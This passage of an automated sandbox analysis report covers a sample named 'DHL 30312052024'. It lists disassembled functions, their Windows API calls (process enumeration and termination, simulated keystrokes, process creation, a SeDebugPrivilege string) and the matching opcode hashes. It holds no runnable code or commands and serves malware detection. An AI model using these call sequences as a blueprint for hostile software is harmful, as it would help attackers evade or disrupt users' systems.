                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C862EC
                                                                                        • GetWindowLongW.USER32(013B77E0,000000F0), ref: 00C8631F
                                                                                        • GetWindowLongW.USER32(013B77E0,000000F0), ref: 00C86354
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C86386
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C863B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C863C1
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C863DB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2178440468-2594219639
                                                                                        • Opcode ID: 22cefe975e915ce17b4ee36dd926ffbae82c8cf939de64559cafd574e79c0f74
                                                                                        • Instruction ID: 3968009fd884c2a2c8219ab2ea926a494e026bf0758ca8a746d3d2f5030c8367
                                                                                        • Opcode Fuzzy Hash: 22cefe975e915ce17b4ee36dd926ffbae82c8cf939de64559cafd574e79c0f74
                                                                                        • Instruction Fuzzy Hash: 74311230640250AFDB21DF19EC85F5937E1FB4A718F1902A8F521DF2B2CB71AD809B59
                                                                                        Function 00C78C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C8F910), ref: 00C78D28
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C8F910), ref: 00C78D5C
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C78ED6
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00C78F00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: 7b07f8fb5dd54c91b5df7603a012cdc06b53939cf0bec40c3e20499f8f744716
                                                                                        • Instruction ID: 29d076864c245e39e2e06817c4e476f75a69ec27d2e30d804198d66c730bab76
                                                                                        • Opcode Fuzzy Hash: 7b07f8fb5dd54c91b5df7603a012cdc06b53939cf0bec40c3e20499f8f744716
                                                                                        • Instruction Fuzzy Hash: E5F14B75A00209EFDF14DF94C888EAEB7B9FF49314F108458FA19AB251DB31AE46DB50
                                                                                        Function 00C7F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C7F6B5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F848
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F86C
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F8AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F8CE
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7FA4A
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C7FA7C
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C7FAAB
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C7FB22
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: 8761237e7bb1949565abad0501793ecbdf543305e83623f9590bf01a5a1b8e6f
                                                                                        • Instruction ID: 02fa87967f34e209e542fcb700319c53dcd9b21146cb1d962929401815b49d76
                                                                                        • Opcode Fuzzy Hash: 8761237e7bb1949565abad0501793ecbdf543305e83623f9590bf01a5a1b8e6f
                                                                                        • Instruction Fuzzy Hash: A1E1AE712043009FC724EF24C891B6ABBE1EF85314F14C96DF8999B2A2CB30DD46EB52
                                                                                        Function 00C64CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C63697,?), ref: 00C6468B
                                                                                          • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C63697,?), ref: 00C646A4
                                                                                          • Part of subcall function 00C64A31: GetFileAttributesW.KERNEL32(?,00C6370B), ref: 00C64A32
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C64D40
                                                                                        • _wcscmp.LIBCMT ref: 00C64D5A
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00C64D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 5fc2a2f7918c0c8a3526f82e7cd9e4f1e7e723b361854be52e4ce1fe55a6b23f
                                                                                        • Instruction ID: 06c934822237917d427b8bf76de3e93587c529043936fbb420022b3348e628ab
                                                                                        • Opcode Fuzzy Hash: 5fc2a2f7918c0c8a3526f82e7cd9e4f1e7e723b361854be52e4ce1fe55a6b23f
                                                                                        • Instruction Fuzzy Hash: 465164B24083859BC735EBA0D8819DFB3ECAF85350F00092EF689D3151EF75A689D766
                                                                                        Function 00C5966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5A84C
                                                                                          • Part of subcall function 00C5A82C: GetCurrentThreadId.KERNEL32 ref: 00C5A853
                                                                                          • Part of subcall function 00C5A82C: AttachThreadInput.USER32(00000000,?,00C59683,?,00000001), ref: 00C5A85A
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C5968E
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C596AB
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C596AE
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C596B7
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C596D5
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C596D8
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C596E1
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C596F8
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C596FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: ed31eb118b4d2bcf65c96880f22431774f51be27b82023dec7576a0b5c677481
                                                                                        • Instruction ID: 9c073c01e2b829550620ee7ba7d59f95e1b4fc951b657d2e31b0e76bd21a357f
                                                                                        • Opcode Fuzzy Hash: ed31eb118b4d2bcf65c96880f22431774f51be27b82023dec7576a0b5c677481
                                                                                        • Instruction Fuzzy Hash: BF11E1B1A10218BEF6106F61DC89F6E3B2DEB4C751F100529F644AB0E0C9F26C51DBA8
                                                                                        Function 00C58921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C5853C,00000B00,?,?), ref: 00C5892A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00C5853C,00000B00,?,?), ref: 00C58931
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C5853C,00000B00,?,?), ref: 00C58946
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00C5853C,00000B00,?,?), ref: 00C5894E
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00C5853C,00000B00,?,?), ref: 00C58951
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C5853C,00000B00,?,?), ref: 00C58961
                                                                                        • GetCurrentProcess.KERNEL32(00C5853C,00000000,?,00C5853C,00000B00,?,?), ref: 00C58969
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00C5853C,00000B00,?,?), ref: 00C5896C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00C58992,00000000,00000000,00000000), ref: 00C58986
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 9cd3f7478118bcf220f748ffa18691b8aa286734f9ab8ff16f01b434bd002e8d
                                                                                        • Instruction ID: 1ba36da6bc2870101aa9c3779de65e7a8e90397d66d7d7d8d090c1633b395af0
                                                                                        • Opcode Fuzzy Hash: 9cd3f7478118bcf220f748ffa18691b8aa286734f9ab8ff16f01b434bd002e8d
                                                                                        • Instruction Fuzzy Hash: 2201A4B5240308FFE610ABA5DC8DF6F7BACEB89711F408425FA05DB2A1CA749C158B24
                                                                                        Function 00C79B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: 1e26b6e5886e6c303c77327dae1e89bea841c6f67b637106d7976c5e092b21d5
                                                                                        • Instruction ID: 56ea9e55c5d8b6f8fb47f3570799756a15e86a7badf41384d2110886cbbda376
                                                                                        • Opcode Fuzzy Hash: 1e26b6e5886e6c303c77327dae1e89bea841c6f67b637106d7976c5e092b21d5
                                                                                        • Instruction Fuzzy Hash: 72C1A371A002199FDF10DF99D885BAEB7F5FF48314F14C469E919AB280E7709E45CB90
                                                                                        Function 00C79113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: c9472b289916a23413c68cbd2b6dacf24b848e2cbdb3ab150ad6dad09eeda195
                                                                                        • Instruction ID: 007fa1d6cb64fdb6d7fb02ffec419731263c100a21f59b85b4e5fee4718a29c5
                                                                                        • Opcode Fuzzy Hash: c9472b289916a23413c68cbd2b6dacf24b848e2cbdb3ab150ad6dad09eeda195
                                                                                        • Instruction Fuzzy Hash: 3A91AD71A00219ABDF24DFA5C848FAEBBB8EF85710F10C159F519AB291D7709A45CFA0
                                                                                        Function 00C7975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?,?,00C57455), ref: 00C57127
                                                                                          • Part of subcall function 00C5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57142
                                                                                          • Part of subcall function 00C5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57150
                                                                                          • Part of subcall function 00C5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?), ref: 00C57160
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C79806
                                                                                        • _memset.LIBCMT ref: 00C79813
                                                                                        • _memset.LIBCMT ref: 00C79956
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C79982
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00C7998D
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 00C799DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: a594f1f9d330a567438be18561080807d4de7f73082d320f2e85d8fc39f3eb29
                                                                                        • Instruction ID: b3b70dfbd3205e911f78e3d313c0d81e89af16ac9984df76d653872cc3464682
                                                                                        • Opcode Fuzzy Hash: a594f1f9d330a567438be18561080807d4de7f73082d320f2e85d8fc39f3eb29
                                                                                        • Instruction Fuzzy Hash: 2B913971D00228EBDB10DFA5DC85EDEBBB9EF09310F108169F519A7291EB719A44DFA0
                                                                                        Function 00C7E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C63C7A
                                                                                          • Part of subcall function 00C63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C63C88
                                                                                          • Part of subcall function 00C63C55: CloseHandle.KERNEL32(00000000), ref: 00C63D52
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7E9A4
                                                                                        • GetLastError.KERNEL32 ref: 00C7E9B7
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7E9E6
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7EA63
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00C7EA6E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C7EAA3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: b266ace6e249d3a8d1b5d788d7154fde20ddc349efe2f880cb8094cad8f89997
                                                                                        • Instruction ID: 67188d2e23a091aee5df8d3b93110c2f53a3c49379bb5676f7805f0f60bb1285
                                                                                        • Opcode Fuzzy Hash: b266ace6e249d3a8d1b5d788d7154fde20ddc349efe2f880cb8094cad8f89997
                                                                                        • Instruction Fuzzy Hash: 4641BD722002009FDB10EF24CC95F6EBBA5AF54324F04C45CF9469B3D2DB70A949EB95
                                                                                        Function 00C8B69E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00CC57B0,00000000,013B77E0,?,?,00CC57B0,?,00C8B5A8,?,?), ref: 00C8B712
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00C8B736
                                                                                        • ShowWindow.USER32(00CC57B0,00000000,013B77E0,?,?,00CC57B0,?,00C8B5A8,?,?), ref: 00C8B796
                                                                                        • ShowWindow.USER32(00000000,00000004,?,00C8B5A8,?,?), ref: 00C8B7A8
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00C8B7CC
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C8B7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 642888154-2594219639
                                                                                        • Opcode ID: 454fd061921823eb5d233fc4beebb7d81af7bc3961fbb3d0d2bb10e5b88e7fae
                                                                                        • Instruction ID: 04ce002bf23613aa3bd42c55d10c618e50956fe161a0e3f8017e1dbf6c8cab43
                                                                                        • Opcode Fuzzy Hash: 454fd061921823eb5d233fc4beebb7d81af7bc3961fbb3d0d2bb10e5b88e7fae
                                                                                        • Instruction Fuzzy Hash: E341A334600340AFDB22DF24C499B957BE0FF49319F1841B9F9688F6A2C731AD56CB68
                                                                                        Function 00C62F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00C63033
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: 45a66f8c26423e5238180645f853ff314aaeae510c22b9b1caad3d8e87ab4e96
                                                                                        • Instruction ID: e2f7393cee1598d38c44b3e79df3d34db8eb062d507db74606669be988d250dd
                                                                                        • Opcode Fuzzy Hash: 45a66f8c26423e5238180645f853ff314aaeae510c22b9b1caad3d8e87ab4e96
                                                                                        • Instruction Fuzzy Hash: B3110531248386BAF7349A55ECC2DAF6B9C9F15320F20002AFA00A6181DB706F4866A5
                                                                                        Function 00C642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C64312
                                                                                        • LoadStringW.USER32(00000000), ref: 00C64319
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C6432F
                                                                                        • LoadStringW.USER32(00000000), ref: 00C64336
                                                                                        • _wprintf.LIBCMT ref: 00C6435C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C6437A
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00C64357
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 8395d986afe8d86b0284ca951e2287199dd9f9b498f066d0cf63abb46f8ac0ff
                                                                                        • Instruction ID: 3eff01fd33d1998ad6db70ac8bbf07ffd93f440ae94c19ba06b17ef701057b9f
                                                                                        • Opcode Fuzzy Hash: 8395d986afe8d86b0284ca951e2287199dd9f9b498f066d0cf63abb46f8ac0ff
